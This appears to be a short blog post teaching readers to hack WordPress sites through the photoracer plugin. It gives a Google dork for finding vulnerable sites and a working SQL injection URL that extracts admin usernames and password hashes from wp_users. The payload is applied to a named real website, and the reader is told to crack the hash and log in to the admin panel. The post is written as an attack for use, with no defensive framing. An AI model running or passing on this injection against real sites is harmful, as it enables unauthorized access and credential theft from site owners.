Hi now, i tell you how to hack wordpress site with easy way.
First we search with this in google to find sites
inurl:"wp-content/plugins/photoracer/viewimg.php?id="
see the Result :-
![[Image: asdmr.png]](http://img808.imageshack.us/img808/5061/asdmr.png)
and i'm gonna test 1 of them for ex this find in google
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2
we are going to add the exploit : this is the exploit
/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
and the site look like this
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
now you can see the user and pass :D ! Just crack the hash and it's done
The admin panel is
http://Site/wp-login.php
No comments:
Post a Comment